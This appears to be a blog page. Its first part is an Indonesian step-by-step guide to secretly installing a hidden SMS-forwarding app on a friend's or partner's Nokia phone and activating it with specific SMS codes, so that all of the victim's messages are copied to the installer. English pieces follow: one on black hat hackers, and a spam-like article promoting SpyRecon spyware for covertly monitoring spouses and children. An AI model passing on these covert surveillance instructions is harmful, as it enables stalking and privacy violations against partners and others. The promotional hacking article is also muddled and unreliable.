saya akan memberikan anda beberapa tips trik rahasia untuk menyadap sms nomer teman anda. Biasanya, trik ini digunakan para detektif tuk mensadap HP seseorang. Baik itu SMS maupun Telepon. ( kok saya bisa tahu trik ini?) Tetapi saya hanya akan menjelaskan kepada anda cara menyadap sms. Menakutkan bila menyadap/sadap telepon. Artikel ini hanya sebagai hiburan saja. Jangan memakainya dengan maksud jahat karena perbuatan dosa anda akan sangat besar.
Tujuannya, supaya kita bisa setia dengan pacar kita, tidak ada yg berani selingkuh, dan supaya tidak ada teman kita yang menghianati kepercayaan. Kalo saya se..buat adek saya aja, soalnya dia nakal dan suka boong lwt sms. Anda mau tahu kan caranya? setelah anda tahu rahasia ini, anda wajib komentar lo!

Tentu saja ada persyaratan yg harus dipenuhi :

1. Dilarang Memakai ini untuk perbuatan lainnya kecuali untuk hiburan
2. HP adalah HP symbian. Baik HP anda maupun HP teman anda.
3. Merek NOKIA
4. Memiliki aplikasi simbyan smsanywherelite.sis

Nah..persyaratan itu harus anda lakukan sebelum anda mensadap sms. Hp anda harus symbian dan nokia ( kalo bisa). dan hp teman anda yang akan disadap juga symbian dan nokia. (promosi nokia ni). Kalo ga punya nokia, jangan teruskan baca artikel ini karena besar kemungkinan akan gagal. Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp :

1. download smsanywherelite.sis untuk software menyadap
2. Masukkan aplikasi symbian itu di HP anda dan teman anda
3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).
4. Siapkan hp/ponsel korban anda
5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.
6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.
7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0
8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

Dengan begini, kita akan tahu mana pacar kita yang selingkuh..mana teman yang berkhianat dan lainnya. Semoga bermanfaat!

gravatar

Black Hat Hackers


Black Hat Hackers

Thanks to Hollywood, black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals. 
Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult.

What Is Black Hat Hacking?

A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transferences to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10'000,000 to Citigroup.

Differences Between White Hat And A Black Hat Hacker

The difference between black hat and white hat hackers is that white hat hacker uses their skills and knowledge as a way to defend someone from attackers. That means that white hat hackers offer their services to corporations, public organizations and educational institutions.

These services include a complete revision of their computer network security, implementation of new security systems (they may be hardware or software), user training and future recommendations. All these measures will be able to combat unauthorized hacking; black hat hackers, however, will continue trying. 

gravatar

hacking


Hacking Software Programs: Making Novices Professionals

The Computer Emergency Response Team (CERT) has warned of the increasing menace of the cyber attack due to the emergence far sharper automated hacking tools, which have been designed to cast maximum impact within the minimum time. 
With a huge number of hacker software the malicious hackers can command distributed systems to scan automatically the systems and attack the systems by taking the immediate advantage of the systems' vulnerable points and exploiting them.

Hundreds of free hacking softwares are easily available and they are so easy to operate, that even a novice can turn to be a highly paid professional. With a wide range of easy-to-use hacking software South Africa has turned to be the hackers' heaven, injecting illegitimate programs into the remote systems by the fraudulent act of breaking into the websites.

Initiate Attacks with Hacking Program

The hackers, by any means, initiate attacks on a Gamco server, which houses innumerable number of websites. By this they can easily gain hassle free access to these sites, with a motive to suck out information and secret records and in cases even money. hacker softwares are technically engineered superior monitoring software products that are used as the hacking programs that help to find out whatever the hacker wants to know.



A hacker may be a spouse who can use a free hacking program with an intention to know all about his or her wife or husband. Concerned guardians can also hack into the systems of their wards in order to detect their actions and steps.

With a great variety of the easily available password hacking programs a hacker breaks into the sites of small and large business houses, thereby smuggling off all the secret records as regard to the concerns' financial aspects and other movements.

A wonderful example of such a software program is SpyRecon, which allows a hacker to monitor a remote system from any places - however far it may be. SpyRecon is hacking program - so smart and so strong, that it allows the user to track any targeted system and secretly record everything automatically that is happening to the system targeted. This is perhaps the only hacker software that sends every single recorded activity, login details, keystrokes, screen shots to the required email address and even personal chat conversations. To the utter surprise, the SpyRecon have proved to be cent percent compatible with almost all kinds of major online services or applications like Neopets, Yahoo, AOL, Hotmail, MSN, Livejournals and AIM.

There exist a huge volume of free hacking softwares just as smart as the SpyRecon, providing the hackers immense pleasure of breaking into the other systems without any affliction. Another such latest hacking program, which one can get for absolutely free, is the Camera/Shy software, released out very recently by a dedicated group of hackers know as Hactivismo.

The activists can exchange banned contents across the World Wide Web with the help of the Camera/Shy software. Since the software is dedicated to the memory of the famous former Chinese leader Wang Ruowang, it has been found that China is the one nation that have shown tremendous interest in the Camera/Shy software. The Steganography software is again another free hacking program that has been designed to be used by more sophisticated users who have got a sound grip over the technical know-how.